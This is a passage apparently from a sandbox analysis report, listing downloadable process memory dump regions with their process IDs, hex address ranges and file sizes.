memory/1216-350-0x0000021488F20000-0x0000021488F47000-memory.dmp

Filesize
156KB

Download
memory/1216-354-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/1332-355-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/1332-376-0x0000015BAEB70000-0x0000015BAEB97000-memory.dmp

Filesize
156KB

Download
memory/1332-351-0x0000015BAEB70000-0x0000015BAEB97000-memory.dmp

Filesize
156KB

Download
memory/1348-380-0x000001C8CB5C0000-0x000001C8CB5E7000-memory.dmp

Filesize
156KB

Download
memory/1348-359-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/1348-357-0x000001C8CB5C0000-0x000001C8CB5E7000-memory.dmp

Filesize
156KB

Download
memory/1356-277-0x000002885D260000-0x000002885D270000-memory.dmp

Filesize
64KB

Download
memory/1356-319-0x000002885D260000-0x000002885D270000-memory.dmp

Filesize
64KB

Download
memory/1356-320-0x00007FF4B2720000-0x00007FF4B2730000-memory.dmp

Filesize
64KB

Download
memory/1356-278-0x000002885D260000-0x000002885D270000-memory.dmp

Filesize
64KB

Download
memory/1360-363-0x00007FF83AAD0000-0x00007FF83AAE0000-memory.dmp

Filesize
64KB

Download
memory/1360-360-0x000001D947FB0000-0x000001D947FD7000-memory.dmp

Filesize
156KB

Download
memory/1360-383-0x000001D947FB0000-0x000001D947FD7000-memory.dmp

Filesize
156KB

Download
memory/1376-387-0x000002571EAE0000-0x000002571EB07000-memory.dmp

Filesize
156KB

Download
memory/1404-391-0x0000015DFE530000-0x0000015DFE557000-memory.dmp

Filesize
156KB

Download
memory/1568-397-0x0000014E6EF70000-0x0000014E6EF97000-memory.dmp

Filesize
156KB

Download
memory/1688-402-0x000001AF17460000-0x000001AF17487000-memory.dmp

Filesize
156KB

Download
memory/1844-200-0x0000000007080000-0x0000000007112000-memory.dmp

Filesize
584KB

Download
memory/1844-193-0x0000000004B40000-0x0000000004B50000-memory.dmp

Filesize
64KB

Download
memory/1844-195-0x0000000004B40000-0x0000000004B50000-memory.dmp

Filesize
64KB

Download
memory/1844-196-0x0000000004B40000-0x0000000004B50000-memory.dmp

Filesize
64KB

Download
memory/3444-198-0x00000000082F0000-0x000000000830A000-memory.dmp

Filesize
104KB

Download
memory/3444-167-0x00000000068E0000-0x00000000068FA000-memory.dmp

Filesize
104KB

Download
memory/3444-148-0x0000000002DB0000-0x0000000002DE6000-memory.dmp

Filesize
216KB

Download
memory/3444-149-0x0000000005070000-0x0000000005080000-memory.dmp

Filesize
64KB

Download
memory/3444-150-0x0000000005070000-0x0000000005080000-memory.dmp

Filesize
64KB

Download
memory/3444-151-0x00000000056B0000-0x0000000005CD8000-memory.dmp

Filesize
6.2MB

Download
memory/3444-152-0x0000000005520000-0x0000000005542000-memory.dmp

Filesize
136KB

Download
memory/3444-153-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/3444-154-0x0000000005DC0000-0x0000000005E26000-memory.dmp

Filesize
408KB

Download
memory/3444-164-0x00000000063A0000-0x00000000063BE000-memory.dmp

Filesize
120KB

Download
memory/3444-165-0x0000000005070000-0x0000000005080000-memory.dmp

Filesize
64KB

Download
memory/3444-166-0x0000000007390000-0x0000000007426000-memory.dmp

Filesize
600KB

Download
memory/3444-168-0x0000000006930000-0x0000000006952000-memory.dmp

Filesize
136KB

Download
memory/3444-169-0x00000000079E0000-0x0000000007F84000-memory.dmp

Filesize
5.6MB

Download
memory/3444-170-0x0000000007970000-0x00000000079A2000-memory.dmp

Filesize
200KB

Download
memory/3444-171-0x0000000070620000-0x000000007066C000-memory.dmp

Filesize
304KB

Download
memory/3444-186-0x0000000007950000-0x000000000796E000-memory.dmp

Filesize
120KB

Download
memory/3444-206-0x000000007F3F0000-0x000000007F400000-memory.dmp

Filesize
64KB

Download
memory/3444-205-0x0000000005070000-0x0000000005080000-memory.dmp

Filesize
64KB

Download
memory/3444-204-0x0000000005070000-0x0000000005080000-memory.dmp

Filesize
64KB

Download
memory/3444-203-0x0000000005070000-0x0000000005080000-memory.dmp

Filesize
64KB

Download
memory/3444-199-0x00000000082E0000-0x00000000082E8000-memory.dmp

Filesize
32KB

Download
memory/3444-197-0x0000000008280000-0x000000000828E000-memory.dmp

Filesize
56KB

Download
memory/3444-194-0x00000000080F0000-0x00000000080FA000-memory.dmp

Filesize
40KB

Download
memory/3444-192-0x000000007F3F0000-0x000000007F400000-memory.dmp

Filesize
64KB

Download
memory/3444-191-0x00000000086D0000-0x0000000008D4A000-memory.dmp

Filesize
6.5MB

Download
memory/4232-275-0x00007FF87A950000-0x00007FF87AA0E000-memory.dmp

Filesize
760KB

Download
memory/4232-274-0x00007FF87AA50000-0x00007FF87AC45000-memory.dmp

Filesize
2.0MB

Download
memory/4232-312-0x00007FF7E7550000-0x00007FF7E7579000-memory.dmp

Filesize
164KB

Download
memory/4328-261-0x000002429DBC0000-0x000002429DBDC000-memory.dmp

Filesize
112KB

Download
memory/4328-265-0x000002429DBF0000-0x000002429DBFA000-memory.dmp

Filesize
40KB

Download
memory/4328-250-0x000002429C300000-0x000002429C310000-memory.dmp

Filesize
64KB

Download
memory/4328-262-0x000002429DBE0000-0x000002429DBEA000-memory.dmp

Filesize
40KB

Download
memory/4328-263-0x00007FF451920000-0x00007FF451930000-memory.dmp

Filesize
64KB

Download
memory/4328-251-0x000002429C300000-0x000002429C310000-memory.dmp

Filesize
64KB

Download
memory/4328-264-0x000002429DE30000-0x000002429DE4C000-memory.dmp

Filesize
112KB

Download
memory/4328-240-0x000002429D840000-0x000002429D862000-memory.dmp

Filesize
136KB

Download
memory/4328-266-0x000002429DE50000-0x000002429DE6A000-memory.dmp

Filesize
104KB

Download
memory/4328-267-0x000002429DE10000-0x000002429DE18000-memory.dmp

Filesize
32KB

Download
memory/4328-268-0x000002429DE20000-0x000002429DE26000-memory.dmp

Filesize
24KB

Download
memory/4328-269-0x000002429DE70000-0x000002429DE7A000-memory.dmp

Filesize
40KB

Download
memory/4868-306-0x00007FF7C8D20000-0x00007FF7C92EC000-memory.dmp

Filesize
5.8MB

Download
memory/5064-147-0x0000000000400000-0x0000000001D8A000-memory.dmp

Filesize
25.5MB

Download